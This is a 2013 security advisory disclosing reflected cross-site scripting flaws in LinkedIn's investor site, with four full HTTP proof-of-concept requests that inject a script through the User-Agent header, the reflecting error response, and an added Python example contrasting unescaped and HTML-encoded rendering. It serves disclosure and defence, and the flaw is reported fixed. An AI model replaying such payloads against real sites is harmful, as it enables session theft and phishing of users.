Multiple Reflected XSS vulnerabilities

=============================================
INTERNET SECURITY AUDITORS ALERT 2013-006
- Original release date: 4th March 2013
- Last revised:  25th March 2013
- Discovered by: Eduardo Garcia Melia
- Severity: 4.3/10 (CVSS Base Scored)
=============================================

I. VULNERABILITY
-------------------------
Multiple Reflected XSS vulnerabilities in LinkedIn Investors.

II. BACKGROUND
-------------------------
LinkedIn is a social networking service and website
(http://www.linkedin.com/) that operates the world's largest
professional network on the Internet, with more than 187 million
members in over 200 countries and territories.

More Information: http://press.linkedin.com/about

III. DESCRIPTION
-------------------------
LinkedIn Investors is affected by multiple reflected Cross-Site
Scripting vulnerabilities. An attacker can inject HTML or script code
that runs in the context of the victim's browser, and so can perform
XSS attacks and steal the cookies of a targeted user. The affected
resource is http://investors.linkedin.com.

IV. PROOF OF CONCEPT
-------------------------
The XSS vulnerability is in the User-Agent header: a malformed
query-string value makes the application return its ColdFusion error
page, which reflects the User-Agent value unencoded (see the response
below):
===============
First XSS
===============
        GET /releasedetail.cfm?ReleaseID=738977' HTTP/1.1
        Host: investors.linkedin.com
        Proxy-Connection: keep-alive
        Cache-Control: max-age=0
        Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: <script>alert("XSS")</script>
        Accept-Encoding: gzip,deflate,sdch
        Accept-Language: en-US,en;q=0.8
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
        Content-Length: 2

===============
Second XSS
===============
        GET /eventdetail.cfm?eventid=124442'-- HTTP/1.1
        Host: investors.linkedin.com
        Proxy-Connection: keep-alive
        Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: <script>alert("XSS")</script>
        Accept-Encoding: gzip,deflate,sdch
        Accept-Language: en-US,en;q=0.8
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
        Content-Length: 2
        
===============
Third XSS
=============== 
        GET /stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'--
        HTTP/1.1
        Host: investors.linkedin.com
        Proxy-Connection: keep-alive
        Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: <script>alert("XSS")</script>
        Referer: http://investors.linkedin.com/stocklookup.cfm
        Accept-Encoding: gzip,deflate,sdch
        Accept-Language: en-US,en;q=0.8
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
        Content-Length: 2
        
===============
Fourth XSS
=============== 
        GET /calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs&historic_Month=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate HTTP/1.1
        Host: investors.linkedin.com
        Proxy-Connection: keep-alive
        Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: <script>alert("XSS")</script>
        Referer: http://investors.linkedin.com/calculator.cfm
        Accept-Encoding: gzip,deflate,sdch
        Accept-Language: en-US,en;q=0.8
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
        Content-Length: 2

RESPONSE in all cases:

        HTTP/1.1 500 Internal Server Error
        Connection: close
        Date: Mon, 04 Mar 2013 11:34:48 GMT
        Server: Microsoft-IIS/6.0
        X-Powered-By: ASP.NET
        server-error: true
        Content-Type: text/html; charset=UTF-8

        <h2>Error occurred processing request</h2>

        <b>Error Diagnostic</b><p>
        <cfoutput>
        Element RESULT.TITLE is undefined in RELEASEDETAIL.  <br>The error
        occurred on line 175.

        Date/Time: Mon Mar 04 06:34:48 EST 2013<br>
        Browser: <script>alert("XSS")</script><br>
        Remote Address: 192.168.149.88<br>
        <!--- removed query string from error page - info sec viewed it as
        XSS - tws - 05/18/2010 --->
        </cfoutput>

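As an added illustration (not part of the advisory, and not LinkedIn's or
ColdFusion's code), the following Python models the diagnostic page shown
above: one function reproduces the unencoded reflection of the User-Agent
header, the other applies HTML encoding before the value is placed in the
markup, which is the fix (the role encodeForHTML() plays in CFML). Function
names and the sample values are constructed for the example.

```python
import html

# Constructed sample values, modelled on the advisory's proof of concept.
SAMPLE_UA = '<script>alert("XSS")</script>'
SAMPLE_ADDR = "192.168.149.88"
SAMPLE_MSG = "Element RESULT.TITLE is undefined in RELEASEDETAIL."


def render_error_page_vulnerable(message: str, user_agent: str, remote_addr: str) -> str:
    """Models the ColdFusion diagnostic page from the advisory: request header
    values are concatenated into the HTML as-is, so a User-Agent that contains
    markup is rendered (and executed) as markup."""
    return (
        "<h2>Error occurred processing request</h2>\n"
        "<b>Error Diagnostic</b><p>\n"
        f"{message}<br>\n"
        f"Browser: {user_agent}<br>\n"
        f"Remote Address: {remote_addr}<br>\n"
    )


def render_error_page_hardened(message: str, user_agent: str, remote_addr: str) -> str:
    """Same page with every value that may be attacker-influenced HTML-encoded
    before it is placed in the markup. quote=True also encodes quotes, so the
    value stays safe if it is ever emitted inside an attribute."""
    def esc(value: str) -> str:
        return html.escape(value, quote=True)

    return (
        "<h2>Error occurred processing request</h2>\n"
        "<b>Error Diagnostic</b><p>\n"
        f"{esc(message)}<br>\n"
        f"Browser: {esc(user_agent)}<br>\n"
        f"Remote Address: {esc(remote_addr)}<br>\n"
    )


def reflects_markup(body: str, value: str) -> bool:
    """Regression check for the fix: True when a value containing HTML
    metacharacters appears in the body verbatim, i.e. it was reflected
    without encoding. A value with no metacharacters never counts."""
    return value != html.escape(value, quote=True) and value in body


if __name__ == "__main__":
    for render in (render_error_page_vulnerable, render_error_page_hardened):
        body = render(SAMPLE_MSG, SAMPLE_UA, SAMPLE_ADDR)
        print(render.__name__, "reflects raw markup:", reflects_markup(body, SAMPLE_UA))
```

The same check can be pointed at a real error template by feeding it the body a test client receives for a request with a marker User-Agent.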

V. BUSINESS IMPACT
------------------------
This flaw can be used by a malicious user to send phishing messages to
LinkedIn customers, abusing the users' trust in the LinkedIn portal to
trick them. The user can be forwarded to a LinkedIn clone site that
steals credentials, to a malicious site hosting malware, and more.

VI. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the LinkedIn Investors:
http://investors.linkedin.com

VII. SOLUTION
-------------------------
Corrected by vendor.

VIII. REFERENCES
-------------------------
http://investors.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting

IX. CREDITS
-------------------------
These vulnerabilities have been discovered by
Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March  04, 2013: Initial release
March  10, 2013: Second release

XI. DISCLOSURE TIMELINE
-------------------------
March  04, 2013: Vulnerability acquired by
                 Internet Security Auditors (www.isecauditors.com)
March  10, 2013: Sent to Sec Team.
March  25, 2013: Request for update. Response stating that
                 it was already corrected. Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.


XIV. FOLLOW US
-------------------------
You can follow Internet Security Auditors, news and security
advisories at:
https://www.facebook.com/ISecAuditors
https://twitter.com/ISecAuditors
http://www.linkedin.com/company/internet-security-auditors
http://www.youtube.com/user/ISecAuditors